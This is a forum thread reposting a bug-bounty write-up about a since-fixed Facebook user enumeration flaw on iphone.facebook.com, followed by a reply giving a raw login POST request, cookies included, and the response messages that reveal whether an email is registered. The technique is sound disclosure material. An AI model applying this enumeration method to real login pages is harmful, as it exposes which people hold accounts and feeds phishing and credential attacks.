Jump to content
florin_darck

Facebook User Enumeration Vulnerability

Recommended Posts

Facebook User Enumeration Vulnerability By Bypassing Brute Force Protection

==============================

Bug Status - Reported On 3-5-2013

Fixed On - 12-6-2013

Reward - $1000

=============================

Before next if you dont know about User Enumeration Vulnerability then see below

User Enumeration is a Technique or Vulnerability which can allow an attacker to enumerate all email , user name or sensitive information about any user which is already exist in that target vulnerable web application

So lets move the our testing part

if i said about me then i didnt tried for XSS , CSRF or any other common bug .i always try to find some logical ot unique bug

so while searching this type of bugs in iphone.facebook.com this is special version for iphone users where they can browse fb on their iphone

Now here is the interesting part came

You all are know that every web application have his forgot your password and registration form

where user can reset their password and create a new account.

Lets think that what an attacker can do with this two forms..hmmmmmmmmmmmmmmmmmmm :-)

Yaa he can check that which email address are already exist in that web application by performing the Mass Brute Force Attack.

So i tried to perform this attack on iphone.facebook.com and m.facebook.com forgot your password but all know that facebook have his internal brute force detection mechanism so no once can easily perform this type of attack

as result of this attack i got that after 10 attempts facebook blocking my request so i was unable to perform this attack here.I tried to bypass it but didnt got anything there

Then finally i got a flaw of improper request handling on iphone.facebook.com login panel for users.

http://1.bp.blogspot.com/-bNNKQenh-2Y/UqU9yFIr7aI/AAAAAAAAAoQ/JQTiOHU6syo/s1600/POC+1.jpg

Like in normal web application if you enter only email without giving password then web application will give you an error that " Please Enter Email & Password Or You Entered An Invalid Email Or Password "

but in iphone.facebook.com there is some mistake in request & response.If i enter only email in login panel without giving password then i got an error that " We didnt recognize your email address"

Hmmmmmmmmmmmm

Means we can enumerate the of all email address of existing email id but may facebook also can block our request like last time we do.But this time instead of blocking my request he is giving me "Different Response Code For Existing Or Non Existing Email Id"

200 For Non Existing & 302 For Existing Email

http://4.bp.blogspot.com/-ajYYfaFTV_o/UqL8hjsN0wI/AAAAAAAAAnM/fssvqe4zdn8/s1600/POC+4.jpg

POC

But one think is still in mind that how its possible that facebook brute force mechanism is failed to detect my attempts

Because facebook had forgot to add brute force mechanism on this particular log in page

thats why i am able to perform this kind of attack here

Now the bug is fixed :-)

Source : Web And Information Security

Link to comment
Share on other sites

Host: iphone.facebook.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://iphone.facebook.com/login.php?refsrc=https%3A%2F%2Fiphone.facebook.com%2F&refid=9&e=1348028&email=snoop_sssad%40yahoo.com&signup_layout=layout%7Clower_subdued_button%7C%7Cs_btn%7Cspecial%7C%7Cl_btn%7Cconfirm%7C%7Csignupinstr%7C%7Clogininstr%7C%7Cst%7Ccreate%7C%7Claunched_Jan9&li=5wgCU1xZ4nhIM-Ad4b_WiSQK&_rdr

Cookie: datr=rv7lUj4TLFlhAWGlHvS9xvcC; fr=0CX1ISfPWgHY98GtH.AWW21Ok89H0jKJ-AHRjFqvfyWjw.BS5f65.Hr.FMB.AWXndWPa; lu=TA25WbjfGRRCk4ptWyoz70KA; locale=en_US; reg_fb_gate=http%3A%2F%2Fiphone.facebook.com%2F; reg_fb_ref=https%3A%2F%2Fiphone.facebook.com%2Flogin.php%3Frefsrc%3Dhttps%253A%252F%252Fiphone.facebook.com%252F%26refid%3D9%26e%3D1348028%26email%3Dsnoop_sssad%2540yahoo.com%26signup_layout%3Dlayout%257Clower_subdued_button%257C%257Cs_btn%257Cspecial%257C%257Cl_btn%257Cconfirm%257C%257Csignupinstr%257C%257Clogininstr%257C%257Cst%257Ccreate%257C%257Claunched_Jan9%26li%3D5wgCU1xZ4nhIM-Ad4b_WiSQK; m_ts=1392642569; sfiu=AYjAEYnDRFu1ODLJXhzRo2R_qdcLthL7thmlJVinxvzMKied5NqQ8RhEUsWygYC16lJZeuhomQwo5gg8jL9RQVC3Bu9Vz0owCfflGcI3u3xpKUFk8KDugUWdKuaSikjbZFHsTfJBMHdjmrc-rvjWkONIq0Fbfo1vQNNv9lJCgKruqQ

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 380

post content

lsd=AVrRrtFU&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&version=1&ajax=0&width=0&pxr=0&gps=0&signup_layout=layout%7Clower_subdued_button%7C%7Cs_btn%7Cspecial%7C%7Cl_btn%7Cconfirm%7C%7Csignupinstr%7C%7Clogininstr%7C%7Cst%7Ccreate%7C%7Claunched_Jan9&email=sdfdg3334f@yahoo.com&pass=&login=Log+In

We didn't recognize your email address. = invalid

Your password was incorrect. = valid

sau

Alternatively, we can send you a message with a link you can use to easily login. = valid

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...